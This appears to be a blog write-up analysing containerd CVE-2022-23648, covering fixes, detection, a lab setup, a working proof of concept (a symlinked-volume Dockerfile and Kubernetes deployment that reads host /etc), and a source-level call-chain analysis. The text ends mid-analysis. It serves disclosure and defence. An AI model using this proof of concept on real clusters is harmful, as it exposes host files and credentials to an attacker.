tags: cve, vulnerability-analysis

containerd CVE-2022-23648: Analysis and Reproduction

Note: this article was begun on March 7, 2022. At the time of writing, no detailed information about the vulnerability had been published.

I. Basic Information

Project: https://github.com/containerd/containerd
Publish Date: 2022-03-03
Confirm Link: GHSA-crp2-qrr5-8pq7
CVE-ID: CVE-2022-23648 (GHSA, NVD, MITRE, cvedetails)
EDB-ID:
Exploits: ssst0n3/cve-2022-23648:etc
Affected Versions: <= 1.4.12, 1.5.0 - 1.5.9, 1.6.0
Fixed Versions: 1.4.13, 1.5.10, 1.6.1
Fix Commit: containerd/containerd@075cfdf
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Vulnerability Author: Felix Wilhelm @ Google Project Zero (github)
Author's Report: /project-zero/issues@2244

II. Component Overview

containerd is used by a large number of container platforms, including Kubernetes, Docker, Kata Containers, and LinuxKit, and is the de facto industry standard. It manages the complete container lifecycle, including image transfer and storage, container execution and supervision, storage, and networking.

For more information, see the containerd official website and the GitHub project page.

III. Vulnerability Author

Felix Wilhelm is a cloud security researcher at Google Project Zero. He has discovered multiple vulnerabilities in the container ecosystem and was the first to publicly present the cgroup release_agent container escape technique.

Item Link
Author Felix Wilhelm
Organization Google Project Zero, ERNW
github https://github.com/felixwilhelm
email fwilhelm@google.com
twitter @_fel1x
hackerone https://hackerone.com/fwilhelm?type=user
crunchbase https://www.crunchbase.com/person/felix-wilhelm
linkedin (not visible) https://www.linkedin.cn/injobs/in/felix-wilhelm-298984133
rocketreach https://rocketreach.co/felix-wilhelm-email_46960220
cve owner:fwilhelm@google.com under project zero
author Felix Wilhelm under packetstorm
containerd CVE-2022-23648
runc CVE-2021-43784
Kubernetes: Multiple issues in aws-iam-authenticator
Terminal escape injection in AWS CloudShell
Sublime Package Control: Arbitrary File Write on packagecontrol.io
git CVE-2020-5260,CVE-2020-11008
KVM CVE-2021-29657,CVE-2021-4093,CVE-2019-7222,CVE-2019-7221,CVE-2018-12904
F5 Big IP CVE-2021-22992,CVE-2021-22991
Apache HTTP Server CVE-2020-9490,CVE-2020-11984,CVE-2020-11993
Node.js CVE-2020-8265,CVE-2020-8172
usrsctp Insecure HMAC generation leads to OOB access, pending_reply_queue OOB access
GitHub CVE-2020-15228
HashiCorp Vault CVE-2020-16250,CVE-2020-16251
haproxy CVE-2020-11100
NetworkManager/DHCP CVE-2018-1111
GNOME/evince CVE-2017-1000083
Xen CVE-2018-15471
EMC CVE-2016-0913
Ruby CVE-2013-0156
CakePHP CVE-2010-4335
presentations HITB-2018: DHCP Is Hard
blackhat/us-16: XENPWN: BREAKING PARAVIRTUALIZED DEVICES
44con/london-2015: Playing with Fire: Attacking the FireEye MPS, pdf
blog An EPYC escape: Case-study of a KVM breakout
Enter the Vault: Authentication Issues in HashiCorp Vault
FELIX WILHELM’s blogs at ENRW
other publicly presented the first container escape using release_agent

IV. Vulnerability Details

1. Introduction

When a container is created from a malicious image through containerd's CRI implementation, the attacker can obtain a read-only copy of arbitrary files and directories on the host. This may bypass any policy-based container security mechanism (including Kubernetes Pod Security Policies) and expose potentially sensitive information. Both Kubernetes and crictl can be configured to use containerd's CRI implementation.

2. Impact

2.1 Affected versions

<= 1.4.12, 1.5.0 - 1.5.9, 1.6.0

2.2 Risk

An attacker can read arbitrary files on the host, which may contain sensitive information that enables a full container escape.

2.3 Exploitation scenarios

The k8s/crictl + containerd scenario is affected; the k8s + docker and docker + containerd scenarios are not.

V. Defense

1. Remediation

Upgrade containerd to the latest version.

2. Mitigation

If upgrading containerd is not feasible, restrict users from running custom (untrusted) images.

3. Detection

Because the copying of host files is performed by containerd itself, exploitation can only be detected at the behavioral level.

Exploitation of this vulnerability can be identified by detecting containerd copying critical operating-system files on the host.

VI. Reproduction

1. Environment

1.1 docker-archive image

I have packaged the vulnerable environment as a docker-archive image, which can be used directly.

docker run --privileged -d -p 2222:22 -ti ssst0n3/docker_archive:ubuntu-20.04_kubernetes-1.23.4_containerd.io-1.4.12-1_calico-3.22.1 /start_vm.sh -enable-kvm
ssh -p 2222 root@127.0.0.1
root@127.0.0.1's password: root
root@ubuntu:~# /wait-for.sh

If your environment does not support KVM, you can run the image without it, though it may be somewhat slow.

docker run -d -p 2222:22 -ti ssst0n3/docker_archive:ubuntu-20.04_kubernetes-1.23.4_containerd.io-1.4.12-1_calico-3.22.1
ssh -p 2222 root@127.0.0.1
root@127.0.0.1's password: root
root@ubuntu:~# /wait-for.sh

If you prefer to build the environment yourself, follow the steps in section 1.2 Manual installation below.

1.2 Manual installation

Prepare a Linux host (Ubuntu 20.04 is used here) and install Kubernetes with containerd following the official Kubernetes installation documentation.

1.2.1 Install containerd

https://kubernetes.io/zh/docs/setup/production-environment/container-runtimes/#containerd

Prerequisites for installation and configuration:

cat <<EOF | sudo tee /etc/modules-load.d/containerd.conf
overlay
br_netfilter
EOF

sudo modprobe overlay
sudo modprobe br_netfilter

# Set the required sysctl parameters; these persist across reboots.
cat <<EOF | sudo tee /etc/sysctl.d/99-kubernetes-cri.conf
net.bridge.bridge-nf-call-iptables  = 1
net.ipv4.ip_forward                 = 1
net.bridge.bridge-nf-call-ip6tables = 1
EOF

# Apply sysctl parameters without rebooting
sudo sysctl --system

Install containerd.io following Docker's official installation documentation:

apt-get update
apt-get install ca-certificates curl gnupg lsb-release
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \
  $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
apt-get update

List the available containerd.io versions and choose a vulnerable one:

# apt-cache madison containerd.io
containerd.io |   1.4.13-1 | https://download.docker.com/linux/ubuntu focal/stable amd64 Packages
containerd.io |   1.4.12-1 | https://download.docker.com/linux/ubuntu focal/stable amd64 Packages
...

Since 1.4.13 is the fixed version, we choose 1.4.12-1:

apt-get install -y containerd.io=1.4.12-1

Configure containerd:

sudo mkdir -p /etc/containerd
containerd config default | sudo tee /etc/containerd/config.toml
sed -i '/\[plugins\."io\.containerd\.grpc\.v1\.cri"\.containerd\.runtimes\.runc\.options\]/a SystemdCgroup = true' /etc/containerd/config.toml
sudo systemctl restart containerd

1.2.2 Install Kubernetes

sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl
sudo curl -fsSLo /usr/share/keyrings/kubernetes-archive-keyring.gpg https://packages.cloud.google.com/apt/doc/apt-key.gpg
echo "deb [signed-by=/usr/share/keyrings/kubernetes-archive-keyring.gpg] https://apt.kubernetes.io/ kubernetes-xenial main" | sudo tee /etc/apt/sources.list.d/kubernetes.list
sudo apt-get update
sudo apt-get install -y kubelet kubeadm kubectl

1.2.3 Initialize the cluster and install a CNI

https://docs.projectcalico.org/getting-started/kubernetes/quickstart

kubeadm init --pod-network-cidr=192.168.0.0/16
mkdir -p $HOME/.kube
cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
chown $(id -u):$(id -g) $HOME/.kube/config
kubectl create -f https://docs.projectcalico.org/manifests/tigera-operator.yaml
kubectl create -f https://docs.projectcalico.org/manifests/custom-resources.yaml

Wait for the calico-system pods to start:

watch kubectl get pods -n calico-system

After startup completes, all pods in the calico-system namespace should be in the Running state:

# kubectl get pods -n calico-system
NAME                                       READY   STATUS    RESTARTS   AGE
calico-kube-controllers-67f85d7449-jv9b2   1/1     Running   0          3m40s
calico-node-jfd9t                          1/1     Running   0          3m40s
calico-typha-5ff69d8599-pqj9j              1/1     Running   0          3m40s

Allow pods to be scheduled on the master node:

kubectl taint nodes --all node-role.kubernetes.io/master-

1.2.4 Verify the environment

# containerd --version
containerd containerd.io 1.4.12 7b11cfaabd73bb80907dd23182b9347b4245eb5d
# kubectl get pods -A
NAMESPACE          NAME                                       READY   STATUS    RESTARTS   AGE
calico-apiserver   calico-apiserver-68b5698d78-6qlg2          1/1     Running   0          3m18s
calico-apiserver   calico-apiserver-68b5698d78-wggpj          1/1     Running   0          3m18s
calico-system      calico-kube-controllers-67f85d7449-jv9b2   1/1     Running   0          5m49s
calico-system      calico-node-jfd9t                          1/1     Running   0          5m49s
calico-system      calico-typha-5ff69d8599-pqj9j              1/1     Running   0          5m49s
kube-system        coredns-64897985d-fkn8c                    1/1     Running   0          6m56s
kube-system        coredns-64897985d-vq8tb                    1/1     Running   0          6m56s
kube-system        etcd-cve2022-23684                         1/1     Running   0          7m3s
kube-system        kube-apiserver-cve2022-23684               1/1     Running   0          7m3s
kube-system        kube-controller-manager-cve2022-23684      1/1     Running   0          7m3s
kube-system        kube-proxy-4bctr                           1/1     Running   0          6m56s
kube-system        kube-scheduler-cve2022-23684               1/1     Running   0          7m3s
tigera-operator    tigera-operator-b876f5799-vlxq7            1/1     Running   0          6m56s

2. Reproduction steps

2.1 Prepare the malicious image

Build it yourself, or use the image I have already prepared: ssst0n3/cve-2022-23648:etc

Dockerfile

FROM busybox
RUN ln -s /etc /volume
VOLUME /volume

/etc is the host directory the attacker wants to read; it can be changed to any other directory.

docker build -t ssst0n3/cve-2022-23648:etc .
docker push ssst0n3/cve-2022-23648:etc

2.2 k8s deployment

poc.yaml

apiVersion: apps/v1
kind: Deployment
metadata:
  name: demo-deployment
spec:
  selector:
    matchLabels:
      app: demo
  replicas: 1
  template:
    metadata:
      labels:
        app: demo
    spec:
      containers:
      - name: demo
        image: ssst0n3/cve-2022-23648:etc
        tty: true
        imagePullPolicy: Always

2.3 Verification

Create the file /etc/st0n3 on the host.

touch /etc/st0n3

Deploy the malicious container.

kubectl apply -f poc.yaml

After the container starts, check inside it whether /etc/st0n3 exists; if it does, the attack succeeded.

pod=$(kubectl get pod -l "app=demo" -o jsonpath='{.items[0].metadata.name}')
kubectl wait --for=jsonpath='{.status.phase}'=Running pod/$pod --timeout=60s

kubectl exec -ti $pod -- ls -lah /etc/st0n3
-rw-r--r--    1 root     root           0 Mar 11 15:09 /etc/st0n3

VII. Vulnerability Analysis

1. Root cause analysis

Based on the fix commit, the vulnerable code is the WithVolumes function in containerd's pkg/cri/opts package.

To synchronize files between an image-defined volume and the container filesystem, copyExistingContents(src, host) is called before the container is created, copying the files under the volume path inside the container's rootfs to the host-side volume directory. The src variable here is a path inside the image's filesystem, and the image author can replace it with a symlink.

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/opts/container.go#L115

func WithVolumes(volumeMounts map[string]string) containerd.NewContainerOpts {
    return func(ctx context.Context, client *containerd.Client, c *containers.Container) (err error) {
        ...
        for host, volume := range volumeMounts {
            // The volume may have been defined with a C: prefix, which we can't use here.
            volume = strings.TrimPrefix(volume, "C:")
            for _, mountPath := range mountPaths {
                src := filepath.Join(mountPath, volume)
                if _, err := os.Stat(src); err != nil {
                    if os.IsNotExist(err) {
                        // Skip copying directory if it does not exist.
                        continue
                    }
                    return fmt.Errorf("stat volume in rootfs: %w", err)
                }
                if err := copyExistingContents(src, host); err != nil {
                    return fmt.Errorf("taking runtime copy of volume: %w", err)
                }
            }
        }
        return nil
    }
}
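
To see the flaw in isolation, here is a minimal, self-contained sketch (my own illustration, not containerd code; the temporary directory stands in for mountPath). A path built with filepath.Join looks contained, yet resolves to a host directory once the image plants a symlink:

package main

import (
    "fmt"
    "os"
    "path/filepath"
)

func main() {
    // Simulated container rootfs, standing in for containerd's mountPath.
    rootfs, err := os.MkdirTemp("", "rootfs")
    if err != nil {
        panic(err)
    }
    defer os.RemoveAll(rootfs)

    // What a malicious image layer does: /volume inside the rootfs is a
    // symlink pointing at the host's /etc.
    if err := os.Symlink("/etc", filepath.Join(rootfs, "volume")); err != nil {
        panic(err)
    }

    // What the vulnerable code computes: a purely lexical join.
    src := filepath.Join(rootfs, "/volume")

    // What the kernel actually opens when the copy walks that path.
    resolved, err := filepath.EvalSymlinks(src)
    if err != nil {
        panic(err)
    }

    fmt.Println("joined:  ", src)      // <rootfs>/volume -- looks contained
    fmt.Println("resolved:", resolved) // /etc            -- the host directory
}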

2. Call chain analysis

Analysis shows the complete call chain to the vulnerable code is:

  1. A client calls the gRPC service exposed by containerd, at the API path /runtime.v1.RuntimeService/CreateContainer or /runtime.v1alpha2.RuntimeService/CreateContainer
  2. That API path dispatches to the criService.CreateContainer method
  3. criService.CreateContainer calls the WithVolumes function

The analysis proceeds as follows:

From the fix commit, we know the vulnerable function is WithVolumes in containerd's pkg/cri/opts package, so we trace its callers upward recursively.

This function is called only by the criService.CreateContainer method, where it is appended to the container creation options that are later passed to c.client.NewContainer to create the container.

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/server/container_create.go#L202

func (c *criService) CreateContainer(ctx context.Context, r *runtime.CreateContainerRequest) (_ *runtime.CreateContainerResponse, retErr error) {
    ...
    var volumeMounts []*runtime.Mount
    if !c.config.IgnoreImageDefinedVolumes {
        // Create container image volumes mounts.
        volumeMounts = c.volumeMounts(containerRootDir, config.GetMounts(), &image.ImageSpec.Config)
    }
    ...
    if len(volumeMounts) > 0 {
        mountMap := make(map[string]string)
        for _, v := range volumeMounts {
            mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath
        }
        opts = append(opts, customopts.WithVolumes(mountMap))
    }
    ...
    if cntr, err = c.client.NewContainer(ctx, id, opts...); err != nil {
        return nil, fmt.Errorf("failed to create containerd container: %w", err)
    }
    ...
}

criService is a gRPC service; it is loaded as a plugin during program init.

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/cri.go#L48

func init() {
    ...
    plugin.Register(&plugin.Registration{
        Type:   plugin.GRPCPlugin,
        ID:     "cri",
        ...
        InitFn: initCRIService,
    })
}

func initCRIService(ic *plugin.InitContext) (interface{}, error) {
    ...
    s, err := server.NewCRIService(c, client)
    ...
    return s, nil
}

Every gRPC service registered as a plugin has its Register function executed when containerd starts, registering it as a containerd service.

https://github.com/containerd/containerd/blob/v1.6.0/services/server/server.go#L285

func New(ctx context.Context, config *srvconfig.Config) (*Server, error) {
    ...
    for _, service := range grpcServices {
        if err := service.Register(grpcServer); err != nil {
            return nil, err
        }
    }
    ...
}

criService is wrapped by two services, instrumentedService and instrumentedAlphaService. When criService registers itself, it actually calls the protobuf-generated registration functions, which register these two wrappers as gRPC services. The call flow for both is similar; below we continue tracing with instrumentedService as the example.

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/server/service.go#L183

func (c *criService) Register(s *grpc.Server) error {
    return c.register(s)
}

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/server/service.go#L311

func (c *criService) register(s *grpc.Server) error {
    instrumented := newInstrumentedService(c)
    runtime.RegisterRuntimeServiceServer(s, instrumented)
    runtime.RegisterImageServiceServer(s, instrumented)
    instrumentedAlpha := newInstrumentedAlphaService(c)
    runtime_alpha.RegisterRuntimeServiceServer(s, instrumentedAlpha)
    runtime_alpha.RegisterImageServiceServer(s, instrumentedAlpha)
    return nil
}

https://github.com/containerd/containerd/blob/v1.6.0/vendor/k8s.io/cri-api/pkg/apis/runtime/v1/api.pb.go#L8889

func RegisterRuntimeServiceServer(s *grpc.Server, srv RuntimeServiceServer) {
    s.RegisterService(&_RuntimeService_serviceDesc, srv)
}

From then on, whenever the gRPC service is invoked, the API declared in _RuntimeService_serviceDesc determines which handler runs. For example, a call to the /runtime.v1.RuntimeService/CreateContainer API invokes the _RuntimeService_CreateContainer_Handler function, with the instrumentedService instance passed in as srv.

https://github.com/containerd/containerd/blob/v1.6.0/vendor/k8s.io/cri-api/pkg/apis/runtime/v1/api.pb.go#L9355

var _RuntimeService_serviceDesc = grpc.ServiceDesc{
    ServiceName: "runtime.v1.RuntimeService",
    HandlerType: (*RuntimeServiceServer)(nil),
    Methods: []grpc.MethodDesc{
        ...
        {
            MethodName: "CreateContainer",
            Handler:    _RuntimeService_CreateContainer_Handler,
        },
        ...
    },
    ...
}

https://github.com/containerd/containerd/blob/v1.6.0/vendor/k8s.io/cri-api/pkg/apis/runtime/v1/api.pb.go#L9001

func _RuntimeService_CreateContainer_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) {
    in := new(CreateContainerRequest)
    if err := dec(in); err != nil {
        return nil, err
    }
    if interceptor == nil {
        return srv.(RuntimeServiceServer).CreateContainer(ctx, in)
    }
    info := &grpc.UnaryServerInfo{
        Server:     srv,
        FullMethod: "/runtime.v1.RuntimeService/CreateContainer",
    }
    handler := func(ctx context.Context, req interface{}) (interface{}, error) {
        return srv.(RuntimeServiceServer).CreateContainer(ctx, req.(*CreateContainerRequest))
    }
    return interceptor(ctx, in, info, handler)
}

When _RuntimeService_CreateContainer_Handler calls srv.(RuntimeServiceServer).CreateContainer, the call actually lands on instrumentedService.CreateContainer.

That method is merely a wrapper around criService.CreateContainer, which logs before making the call.

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/server/instrumented_service.go#L404

func (in *instrumentedService) CreateContainer(ctx context.Context, r *runtime.CreateContainerRequest) (res *runtime.CreateContainerResponse, err error) {
    if err := in.checkInitialized(); err != nil {
        return nil, err
    }
    log.G(ctx).Infof("CreateContainer within sandbox %q for container %+v",
        r.GetPodSandboxId(), r.GetConfig().GetMetadata())
    defer func() {
        if err != nil {
            log.G(ctx).WithError(err).Errorf("CreateContainer within sandbox %q for %+v failed",
                r.GetPodSandboxId(), r.GetConfig().GetMetadata())
        } else {
            log.G(ctx).Infof("CreateContainer within sandbox %q for %+v returns container id %q",
                r.GetPodSandboxId(), r.GetConfig().GetMetadata(), res.GetContainerId())
        }
    }()
    res, err = in.c.CreateContainer(ctrdutil.WithNamespace(ctx), r)
    return res, errdefs.ToGRPC(err)
}

Recall from register (repeated below) that the wrapped service's c is the criService instance, so in.c.CreateContainer above is criService.CreateContainer.

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/server/service.go#L311

func (c *criService) register(s *grpc.Server) error {
    instrumented := newInstrumentedService(c)
    ...
}

At this point we have confirmed that the criService.CreateContainer method is reachable as a gRPC service, through the following APIs (a minimal client sketch follows the list):

  • /runtime.v1.RuntimeService/CreateContainer
  • /runtime.v1alpha2.RuntimeService/CreateContainer
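
To make the attack surface concrete, here is a minimal client sketch (my own illustration; the socket path and the unix:// dial scheme are assumptions that depend on the environment and the grpc-go version). The same stub exposes CreateContainer, the RPC that dispatches to criService.CreateContainer and ultimately to WithVolumes:

package main

import (
    "context"
    "fmt"

    "google.golang.org/grpc"
    runtimeapi "k8s.io/cri-api/pkg/apis/runtime/v1"
)

func main() {
    // containerd serves its CRI plugin on the main containerd socket;
    // the path below is the common default and may differ on your host.
    conn, err := grpc.Dial("unix:///run/containerd/containerd.sock", grpc.WithInsecure())
    if err != nil {
        panic(err)
    }
    defer conn.Close()

    client := runtimeapi.NewRuntimeServiceClient(conn)

    // Version is the simplest RPC to confirm we reached the CRI service;
    // client.CreateContainer on this same stub is the call analyzed above.
    resp, err := client.Version(context.Background(), &runtimeapi.VersionRequest{})
    if err != nil {
        panic(err)
    }
    fmt.Printf("runtime: %s %s\n", resp.RuntimeName, resp.RuntimeVersion)
}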

3. Exploitation scenario analysis

Based on the analysis above, reaching the vulnerable code requires calling the CRI API, so we need to determine which mainstream usage scenarios invoke that API. The following scenarios need analysis:

  1. k8s+containerd
  2. k8s+docker+containerd
  3. docker+containerd
  4. ctr+containerd

3.1 k8s+containerd

The k8s + containerd scenario is vulnerable.

According to the call chain analysis above, exploitability requires that k8s call containerd's /runtime.v1.RuntimeService/CreateContainer or /runtime.v1alpha2.RuntimeService/CreateContainer API. Forward analysis verifies that k8s calls this API when creating containers; the analysis is as follows:

When the Kubelet is initialized, it is handed the syncPod method, which synchronizes containers to their desired state.

Because k8s is designed around the reconciler pattern, tracing the full call chain into syncPod would be too lengthy, so this article does not analyze it in detail. To analyze how k8s calls the container runtime, we can start directly from this function.

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/kubelet.go#L649

func NewMainKubelet(...) (*Kubelet, error) {
    ...
    klet.podWorkers = newPodWorkers(
        klet.syncPod,
        ...
    )
    runtime, err := kuberuntime.NewKubeGenericRuntimeManager(...)
    ...
    klet.containerRuntime = runtime
    ...
}

Inside Kubelet.syncPod, containerRuntime.SyncPod is called; containerRuntime is the kubeGenericRuntimeManager object supplied during Kubelet initialization.

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/kubelet.go#L1540

func (kl *Kubelet) syncPod(ctx context.Context, updateType kubetypes.SyncPodType, pod, mirrorPod *v1.Pod, podStatus *kubecontainer.PodStatus) error {
    ...
    result := kl.containerRuntime.SyncPod(pod, podStatus, pullSecrets, kl.backOff)
    ...
}

If a container needs to be created, the kubeGenericRuntimeManager.createPodSandbox method is called.

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/kuberuntime/kuberuntime_manager.go#L817

func (m *kubeGenericRuntimeManager) SyncPod(pod *v1.Pod, podStatus *kubecontainer.PodStatus, pullSecrets []v1.Secret, backOff *flowcontrol.Backoff) (result kubecontainer.PodSyncResult) {
    ...
    podSandboxID, msg, err = m.createPodSandbox(pod, podContainerChanges.Attempt)
    ...
}

This method builds the pod sandbox configuration and then calls runtimeService.RunPodSandbox.

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/kuberuntime/kuberuntime_sandbox.go#L67

func (m *kubeGenericRuntimeManager) createPodSandbox(pod *v1.Pod, attempt uint32) (string, string, error) {
    podSandboxConfig, err := m.generatePodSandboxConfig(pod, attempt)
    ...
    runtimeHandler := ""
    if m.runtimeClassManager != nil {
        runtimeHandler, err = m.runtimeClassManager.LookupRuntimeHandler(pod.Spec.RuntimeClassName)
        ...
    }
    
    podSandBoxID, err := m.runtimeService.RunPodSandbox(podSandboxConfig, runtimeHandler)
    ...
}

runtimeService is a gRPC client; its RunPodSandbox method invokes the gRPC service.

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/kuberuntime/instrumented_services.go#L185

func (in instrumentedRuntimeService) RunPodSandbox(config *runtimeapi.PodSandboxConfig, runtimeHandler string) (string, error) {
    ...
    out, err := in.service.RunPodSandbox(config, runtimeHandler)
    ...
}

There are two API versions here, v1 and v1alpha2; the method corresponding to the version supported by the runtime is called.

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/cri/remote/remote_runtime.go#L180

func (r *remoteRuntimeService) RunPodSandbox(config *runtimeapi.PodSandboxConfig, runtimeHandler string) (string, error) {
    ...
    if r.useV1API() {
        resp, err := r.runtimeClient.RunPodSandbox(ctx, &runtimeapi.RunPodSandboxRequest{
            Config:         config,
            RuntimeHandler: runtimeHandler,
        })
        ...
    } else {
        resp, err := r.runtimeClientV1alpha2.RunPodSandbox(ctx, &runtimeapiV1alpha2.RunPodSandboxRequest{
            Config:         v1alpha2PodSandboxConfig(config),
            RuntimeHandler: runtimeHandler,
        })
        ...
    }
    ...
}

That is, the runtime API /runtime.v1.RuntimeService/RunPodSandbox or /runtime.v1alpha2.RuntimeService/RunPodSandbox is called. This confirms that k8s calls containerd's CRI API, completing the analysis.

https://github.com/kubernetes/kubernetes/blob/v1.23.4/staging/src/k8s.io/cri-api/pkg/apis/runtime/v1/api.pb.go#L8529

func (c *runtimeServiceClient) RunPodSandbox(ctx context.Context, in *RunPodSandboxRequest, opts ...grpc.CallOption) (*RunPodSandboxResponse, error) {
    ...
    err := c.cc.Invoke(ctx, "/runtime.v1.RuntimeService/RunPodSandbox", in, out, opts...)
    ...
}

https://github.com/kubernetes/kubernetes/blob/v1.23.4/staging/src/k8s.io/cri-api/pkg/apis/runtime/v1alpha2/api.pb.go#L8539

func (c *runtimeServiceClient) RunPodSandbox(ctx context.Context, in *RunPodSandboxRequest, opts ...grpc.CallOption) (*RunPodSandboxResponse, error) {
    ...
    err := c.cc.Invoke(ctx, "/runtime.v1alpha2.RuntimeService/RunPodSandbox", in, out, opts...)
    ...
}

3.2 k8s+docker+containerd

Older k8s versions (those still using dockershim; at the time of writing, k8s had not yet completed the dockershim removal) are not affected by this vulnerability. The analysis is as follows:

According to the analysis above, k8s creates containers by calling the runtime API /runtime.v1.RuntimeService/RunPodSandbox or /runtime.v1alpha2.RuntimeService/RunPodSandbox.

If the runtime is dockershim, it should register the same API. Analysis shows that dockershim indeed registers the v1alpha2 API.

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/dockershim/remote/docker_server.go#L73

func (s *DockerServer) Start() error {
    ...
    runtimeapi.RegisterRuntimeServiceServer(s.server, s.service)
    ...
    return nil
}

https://github.com/kubernetes/kubernetes/blob/v1.23.4/staging/src/k8s.io/cri-api/pkg/apis/runtime/v1alpha2/api.pb.go#L8899

func RegisterRuntimeServiceServer(s *grpc.Server, srv RuntimeServiceServer) {
    s.RegisterService(&_RuntimeService_serviceDesc, srv)
}

https://github.com/kubernetes/kubernetes/blob/v1.23.4/staging/src/k8s.io/cri-api/pkg/apis/runtime/v1alpha2/api.pb.go#L9345

var _RuntimeService_serviceDesc = grpc.ServiceDesc{
    ServiceName: "runtime.v1alpha2.RuntimeService",
    ...
    Methods: []grpc.MethodDesc{
        ...
        {
            MethodName: "RunPodSandbox",
            Handler:    _RuntimeService_RunPodSandbox_Handler,
        },
    },
	...
}

Therefore, k8s + docker does not call containerd's CRI API. Whether dockershim's own implementation of this API has a similar problem requires analyzing that implementation. Tracing the call chain shows that dockershim actually calls dockerd's API; this call is identical to the docker + containerd scenario below, so see the analysis of the "docker + containerd" scenario for details.

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/dockershim/docker_sandbox.go#L115

func (ds *dockerService) RunPodSandbox(ctx context.Context, r *runtimeapi.RunPodSandboxRequest) (*runtimeapi.RunPodSandboxResponse, error) {
    ...
    createResp, err := ds.client.CreateContainer(*createConfig)
    ...
}

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/dockershim/libdocker/kube_docker_client.go#L149

func (d *kubeDockerClient) CreateContainer(opts dockertypes.ContainerCreateConfig) (*dockercontainer.ContainerCreateCreatedBody, error) {
	...
	createResp, err := d.client.ContainerCreate(ctx, opts.Config, opts.HostConfig, opts.NetworkingConfig, nil, opts.Name)
	...
}

https://github.com/kubernetes/kubernetes/blob/v1.23.4/vendor/github.com/docker/docker/client/container_create.go#L24

func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, platform *specs.Platform, containerName string) (container.ContainerCreateCreatedBody, error) {
    ...
}

3.3 docker+containerd

docker container create or docker run triggers the container creation flow; according to the analysis, this flow does not reach containerd.

For the detailed flow, see my separate article "Source Code Analysis of the docker container create Flow".

When creating a container, docker also copies files from the container filesystem into the volume. However, when docker copies, the source path in the container filesystem has its symlinks resolved and is confined within the container rootfs, so docker has no vulnerability of the same mechanism.

https://github.com/moby/moby/blob/master/container/container_unix.go#L129

func (container *Container) CopyImagePathContent(v volume.Volume, destination string) error {
    rootfs, err := container.GetResourcePath(destination)
    if err != nil {
        return err
    }
    ...
    id := stringid.GenerateRandomID()
    path, err := v.Mount(id)
    if err != nil {
        return err
    }

    defer func() {
        if err := v.Unmount(id); err != nil {
            logrus.Warnf("error while unmounting volume %s: %v", v.Name(), err)
        }
    }()
    ...
    return copyExistingContents(rootfs, path)
}
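
For comparison, here is a minimal sketch of the scoped resolution docker relies on (GetResourcePath delegates to docker's symlink package; the import path and exact behavior shown here are my reading of the moby code base, not quoted source):

package main

import (
    "fmt"
    "os"
    "path/filepath"

    "github.com/docker/docker/pkg/symlink"
)

func main() {
    rootfs, err := os.MkdirTemp("", "rootfs")
    if err != nil {
        panic(err)
    }
    defer os.RemoveAll(rootfs)

    // The same trick as the containerd PoC: /volume -> /etc.
    if err := os.Symlink("/etc", filepath.Join(rootfs, "volume")); err != nil {
        panic(err)
    }

    // The symlink target is re-anchored under rootfs instead of escaping to /etc.
    safe, err := symlink.FollowSymlinkInScope(filepath.Join(rootfs, "volume"), rootfs)
    fmt.Println(safe, err) // <rootfs>/etc, nil
}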

3.4 ctr+containerd

ctr is containerd's CLI; containers can be created with commands such as ctr container create <ImageName> <ContainerID>. According to the analysis, containers created this way never touch criService.

The analysis is as follows; for a more detailed walkthrough of ctr's container creation flow, see my separate article "The ctr container create Flow".

Starting from createCommand in the cmd/ctr/commands/containers directory and following the calls down, the code does nothing but process arguments and invoke the next Create function.

https://github.com/containerd/containerd/blob/v1.6.0/cmd/ctr/commands/containers/containers.go#L85

var createCommand = cli.Command{
    ...
    Action: func(context *cli.Context) error {
        ...
        _, err = run.NewContainer(ctx, client, context)
        ...
    },
}

https://github.com/containerd/containerd/blob/v1.6.0/cmd/ctr/commands/run/run_unix.go#L347

func NewContainer(ctx gocontext.Context, client *containerd.Client, context *cli.Context) (containerd.Container, error) {
    ...
    return client.NewContainer(ctx, id, cOpts...)
}

https://github.com/containerd/containerd/blob/v1.6.0/client.go#L289

func (c *Client) NewContainer(ctx context.Context, id string, opts ...NewContainerOpts) (Container, error) {
    ...
    r, err := c.ContainerService().Create(ctx, container)
    ...
}

https://github.com/containerd/containerd/blob/v1.6.0/containerstore.go#L110

func (r *remoteContainers) Create(ctx context.Context, container containers.Container) (containers.Container, error) {
    created, err := r.client.Create(ctx, &containersapi.CreateContainerRequest{
        Container: containerToProto(&container),
    })
    ...
}

until the gRPC call is made and the server executes the Create method of the containerd.services.containers.v1.Containers service. This is containerd's core containers service, not the CRI RuntimeService, so the vulnerable WithVolumes path is never reached.

https://github.com/containerd/containerd/blob/v1.6.0/api/services/containers/v1/containers.pb.go#L729

